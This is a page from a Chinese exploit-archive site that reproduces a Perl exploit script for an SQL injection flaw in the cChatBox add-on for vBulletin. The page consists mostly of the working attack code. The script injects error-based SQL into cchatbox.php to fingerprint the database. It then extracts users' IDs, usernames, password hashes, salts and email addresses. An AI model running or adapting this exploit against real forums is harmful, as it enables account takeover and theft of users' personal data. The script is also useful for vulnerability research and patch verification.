首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability
来源:vfocus.net 作者:DSecurity 发布时间:2011-03-03  

#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$ua->agent("MyApp/0.1 ");
print "##################################\n";
print "############ EXPLOIT #############\n";
print "##################################\n";
print "## Portal: cchatbox             ##\n";
print "## Bug: SQLI                    ##\n";
print "## Author: DSecurity            ##\n";
print "## Coder: vv0lll                ##\n";
print "##################################\n";
 
print "Use: exploit.pl address number_user sleeptime\n";
print "Example: exploit.pl http://localhost/vbb 10 10\n";
if(@ARGV < 2) {exit;}
print "\n\n================================================\n";
#Foot print
print v_request('MySQL version: ','@@version');
print v_request('Data dir: ','@@datadir');
print v_request('User: ','user()');
print v_request('Database: ','database()'); 
 
#Get user
for($i=1;$i<=$ARGV[1];$i++){
 print "-----------------------------------------\n";
 print $id = v_request('ID: ','userid','user','1',$i-1);
 if($id =~ /(ID:)\s(.*)/){
  print v_request('Group: ','usergroupid','user','userid='.$2);
  print v_request('Username: ','username','user','userid='.$2);
  print v_request('Password: ','password','user','userid='.$2);
  print v_request('Salt: ','salt','user','userid='.$2);
  print v_request('Email: ','email','user','userid='.$2);
 }
   
  }

print $ARVG[0];
sub v_request{
 #Declare
 $print = $_[0];
 $select = $_[1];
 $from = $_[2];
 $where = $_[3];
 $limit = $_[4];
 $sleep = $ARGV[2];
 if ($from eq '') {$from = 'information_schema.tables';}
 if ($where eq '') {$where = '1';}
 if ($limit eq '') {$limit = '0';}
 if ($sleep eq '') {$sleep = '10';}
 
 # Create a request
 my $req = HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');
 $req->content_type('application/x-www-form-urlencoded');
 $req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');

 # Pass request to the user agent and get a response back
 my $res = $ua->request($req);
 #print $res->content;
 if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
    {$test = $3};
 sleep($sleep);
 return $print.$test."\n";
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Magic Music Editor Buffer Over
·Linux Kernel <= 2.6.37 Local K
·TIOD v1.3.3 for iPhone / iPod
·MS11-011(CVE-2011-0045): MS Wi
·Vsftpd version 2.3.2 proof of
·Citrix Access Gateway Command
·Vsftpd 2.3.2 Denial Of Service
·NetSupport Manager Agent Remot
·PHP Exif Extension 'exif_read_
·PHP Speedy <= 0.5.2 Wordpress
·Quick 'n Easy FTP Server 3.2 D
·JBoss Application Server Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved